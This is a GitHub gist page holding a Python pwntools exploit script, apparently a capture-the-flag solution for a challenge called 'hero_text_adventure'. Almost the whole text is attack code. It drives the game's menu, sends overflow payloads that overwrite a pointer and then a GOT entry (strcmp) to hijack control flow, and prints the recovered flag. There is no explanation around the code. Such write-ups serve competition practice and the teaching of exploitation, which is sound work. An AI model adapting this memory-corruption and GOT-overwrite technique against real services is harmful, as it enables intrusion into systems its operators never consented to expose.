Skip to content

Instantly share code, notes, and snippets.

@akiym

akiym/exploit.py Secret

Created March 18, 2018 10:08
Show Gist options
  • Save akiym/2ace41cc04705e20031f8666183c1150 to your computer and use it in GitHub Desktop.
Save akiym/2ace41cc04705e20031f8666183c1150 to your computer and use it in GitHub Desktop.
hero_text_adventure
# -*- coding: utf-8 -*-
import random
from pwn import *
context.update(arch='amd64', os='linux')
p, u = pack, unpack
REMOTE = len(sys.argv) >= 2 and sys.argv[1] == 'r'
if REMOTE:
host = ''
port = 0
else:
host = '127.0.0.1'
port = 4000
s = remote(host, port)
s.recvuntil('(y/N)\n')
s.send('n\n')
s.recvuntil(':\n')
s.send('A' * 0x20)
s.recvuntil('5) Thor\n')
s.send('5\n')
s.recvuntil('6) exit\n')
s.send('1337\n')
s.send('1000000\n')
for i in range(1, 6):
s.recvuntil('6) exit\n')
s.send('2\n')
s.send('%d\n' % i)
s.recvuntil('6) exit\n')
s.send('3\n')
s.send('1\n')
s.recvuntil('6) exit\n')
s.send('4\n')
payload = (
'A' * 0x20 +
p32(0x400C8C) +
''
)
s.send(payload)
s.recvuntil('6) exit\n')
s.send('3\n')
s.send('2\n')
s.recvuntil('6) exit\n')
s.send('4\n')
s.send('C' * 0x24)
s.send('1\n')
payload = (
'A' * 0x20 +
'A' * 0x20 +
p32(1) +
p32(1) +
p32(1) +
p32(1) +
p32(1) +
p32(1) +
p(0x603088-0x18) + # strcmp@got
''
)
s.send(payload + '\n')
s.recvuntil('6) exit\n')
s.send('4\n')
s.recvuntil('to be?\n')
s.send(p(0x4009F0) + '\n') # strchr@got.plt
s.recvuntil('6) exit\n')
s.send('5\n')
adventure_id = 7128973612576618926
s.send('%d\n' % adventure_id)
s.send('\n')
s.recvuntil('Enter the password\n')
flag = s.recvuntil(', what would you like to do?', drop=True)
print flag
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment